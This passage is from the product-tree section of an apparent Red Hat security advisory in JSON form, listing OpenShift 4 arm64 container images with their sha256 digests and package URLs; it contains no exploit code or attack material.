"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3Afe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3Aeb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3A0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3Aa8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3Afb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Ad07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3Ae95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3A7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557397"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3Ac373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562941"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3Ab9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602042"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Aeb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557339"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"product_id": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-image-customization-controller-rhel9@sha256%3A173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Ab88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3Aa045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3Af59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Aa3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3A92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3Addb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-aws-rhel9@sha256%3A60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557712"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-azure-rhel9@sha256%3A4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557306"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3Aeb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602000"
}
}
},
{
